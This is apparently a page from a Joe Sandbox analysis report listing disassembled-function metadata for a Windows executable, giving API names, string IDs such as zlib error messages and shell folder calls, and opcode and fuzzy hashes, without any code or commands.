                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                                                                                            • API String ID: 0-3255898291
                                                                                                            • Opcode ID: 1e45c625052aaed0026cb6e9d9d155a9553cb1c11e4068b20b0b3ed65267e05e
                                                                                                            • Instruction ID: 36a5a67a6b198623208e03fcdf44eed6b32d9d42851390dc4c2f02830f1e2460
                                                                                                            • Opcode Fuzzy Hash: 1e45c625052aaed0026cb6e9d9d155a9553cb1c11e4068b20b0b3ed65267e05e
                                                                                                            • Instruction Fuzzy Hash: 17D11733618AD08BD71A8F7AD8443AD7BA1F3597C1F048116FB968B7D1DA3ACA49C700
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: incorrect header check$invalid window size$unknown compression method
                                                                                                            • API String ID: 0-1186847913
                                                                                                            • Opcode ID: 52ed7635aeae8ff526247262ac50360336e7a020413c2717a67c94432d795328
                                                                                                            • Instruction ID: 2adac2097dd96be31fc3b588942c2867655d7ffa7f23b7c0480b06af30ac11af
                                                                                                            • Opcode Fuzzy Hash: 52ed7635aeae8ff526247262ac50360336e7a020413c2717a67c94432d795328
                                                                                                            • Instruction Fuzzy Hash: 35917F726042008BFB6ACF26D58879D3BE5F3083D4F154129EB598BBB0D73AD9A1CB40
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $ $invalid block type
                                                                                                            • API String ID: 0-2056396358
                                                                                                            • Opcode ID: 6a1db03687435ebb1430cf625d2d53183cb1bdca78445c29a8775c11b27300e0
                                                                                                            • Instruction ID: a7252faa3c80580baed472012d71d0b62e6cbeab3839f0b874d886ed0dadd07f
                                                                                                            • Opcode Fuzzy Hash: 6a1db03687435ebb1430cf625d2d53183cb1bdca78445c29a8775c11b27300e0
                                                                                                            • Instruction Fuzzy Hash: 6F6190B3610B508BE726CF26D9883AD37A0F3193D4F554125EB568BBE0D77AD590CB40
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 2162964266-0
                                                                                                            • Opcode ID: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                                                                                            • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
                                                                                                            • Opcode Fuzzy Hash: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                                                                                            • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                                                                                            • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
                                                                                                            • Opcode Fuzzy Hash: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                                                                                            • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cf726ec6ae42089ceab56936488a5fdcc83c03c51bcf0dd9a340e541980c14d4
                                                                                                            • Instruction ID: 127c8a3eefbec1cf179e73712b468f180dd3e669bf73dd13b43b77d2e925ff5f
                                                                                                            • Opcode Fuzzy Hash: cf726ec6ae42089ceab56936488a5fdcc83c03c51bcf0dd9a340e541980c14d4
                                                                                                            • Instruction Fuzzy Hash: F8818E733301749BE7668A2EA514BE93690F3693CEFC16114FB8487B85CA3DB921CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5c5c31c79345c80cbc84505c9318a96aa45c2c473e25a63ddceb6769520a1643
                                                                                                            • Instruction ID: 09e49e300f3b48ce8064fe567ba8ae1e18cb52cb4f612ff9abff1437f032a71a
                                                                                                            • Opcode Fuzzy Hash: 5c5c31c79345c80cbc84505c9318a96aa45c2c473e25a63ddceb6769520a1643
                                                                                                            • Instruction Fuzzy Hash: D5712BB33301749BEB658B1E9514BA93390F36A389FC16105FB855BB85CA3EB921CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                                                                                            • Instruction ID: 87c4626dc5aae324383e141a43b2e00566bb5f4a4c096efdb9aa1e36bd959186
                                                                                                            • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                                                                                            • Instruction Fuzzy Hash: CB41843721064087FBAA9B1AA010BEE7790E79A7C5F949115DB829FAE0CA7BD5058B00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                                                                            • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                                                            • API String ID: 217932011-4219398408
                                                                                                            • Opcode ID: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                                                                            • Instruction ID: 4189c401249be1c18680961fdd5f00b64fd9ff4c66db3fab09ee0cba437a9a89
                                                                                                            • Opcode Fuzzy Hash: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                                                                            • Instruction Fuzzy Hash: 6C418F72211B4086EB16EF12F8447EA73A4F78CBC8F544125EB49477A5DF39C55AC700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                                                                            • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                                                            • API String ID: 1740785346-287042676
                                                                                                            • Opcode ID: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                                                                            • Instruction ID: 39544a34e48b1591535f5ec23c8084432afafb0fbbbedabb5ee694640fe7ccea
                                                                                                            • Opcode Fuzzy Hash: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                                                                            • Instruction Fuzzy Hash: A94184B1214A46C2FA26EB57B4A4BF97291AB8C7D0F540127BB0A0B7F5DEB9C841C610
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 298514914-0
                                                                                                            • Opcode ID: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                                                                            • Instruction ID: 65bd0fc00ed65caac6c8ae18375092c396c339aa9c4fc9a556ba9f8eb5a1fbfe
                                                                                                            • Opcode Fuzzy Hash: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                                                                            • Instruction Fuzzy Hash: F141E132205B408AEB129F62EC443E977A0F78CBD5F484129EB490B774DF39C959D740
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsdupfreewcsncpy$Value
                                                                                                            • String ID:
                                                                                                            • API String ID: 1554701960-0
                                                                                                            • Opcode ID: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                                                                            • Instruction ID: 9aa5ebfb9d0338231e5de8689cc7ecd01d3be8732c0a46cca62a2a5aa1271af7
                                                                                                            • Opcode Fuzzy Hash: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                                                                            • Instruction Fuzzy Hash: FB91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProcSleep
                                                                                                            • String ID: 0V$InitOnceExecuteOnce$Kernel32.dll
                                                                                                            • API String ID: 938261879-2442906014
                                                                                                            • Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                                                                            • Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
                                                                                                            • Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                                                                            • Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClassDestroyEnableProcUnregister
                                                                                                            • String ID:
                                                                                                            • API String ID: 1570244450-0
                                                                                                            • Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                                                                            • Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
                                                                                                            • Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                                                                            • Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700
                                                                                                            APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
• String ID:
• API String ID: 3383493704-0
• Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
• Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
• Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
• Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: CriticalSection$AllocHeap$EnterInitializeLeave
• String ID: 0V
• API String ID: 2544007295-2748129481
• Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
• Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
• Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
• Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: Window$CurrentThread$EnableEnumWindows
• String ID:
• API String ID: 2527101397-0
• Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
• Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
• Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
• Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: AllocValue$Heap
• String ID:
• API String ID: 2472784365-0
• Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
• Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
• Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
• Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
• String ID:
• API String ID: 458812214-0
• Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
• Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
• Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
• Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: CriticalSection$FreeHeap$DeleteEnterLeave
• String ID:
• API String ID: 3171405041-0
• Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
• Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
• Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
• Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: memset$memmove
• String ID:
• API String ID: 3527438329-0
• Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
• Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
• Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
• Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
Strings
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID:
• String ID: $ $header crc mismatch
• API String ID: 0-4092041874
• Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
• Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
• Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
• Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
